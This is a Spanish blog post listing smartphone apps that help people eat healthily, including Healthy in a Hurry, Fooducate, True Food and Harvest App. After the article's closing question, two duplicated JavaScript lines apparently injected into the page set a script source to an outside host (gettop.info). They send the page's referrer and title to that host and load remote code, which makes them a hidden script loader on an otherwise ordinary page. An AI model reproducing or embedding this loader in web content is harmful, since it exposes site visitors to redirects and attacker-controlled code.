Salud y belleza » Salud, alimentos

Aplicaciones que te ayudan a comer sano

Sin Comentarios

La tecnología puede ayudarte en muchas cosas, también a alimentarte mejor mediante las aplicaciones de los smartphones, por lo que hoy vamos a proponerte una serie de apps que te ayudan a comer saludablemente.

- Healthy in a Hurry: aplicación gratuita que te ofrece unas 200 recetas exquisitas, también postres y desayunos.

healthy-in-a-hurry-app

- Fooducate: una app para comer sano que te permite además escanear el código de barras de un artículo para saber cuántas calorías tiene, cuáles son sus ingredientes, etc.

fooducate

- True Food: una aplicación que te ayuda a comer de forma saludable y a ingerir alimentos orgánicos. Cuenta con una larga lista de alimentos que no han sido modificados genéticamente y también ofrece una lista con las tiendas que no venden alimentos transgénicos.

true-food-app

- Harvest App: ideal si lo que quieres es comer productos saludables y frescos, porque te ayuda a identificarlos, almacenarlos y lavarlos adecuadamente.

app-comer-sano

¿Crees que son útiles estas aplicaciones para ayudarte a comer bien?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.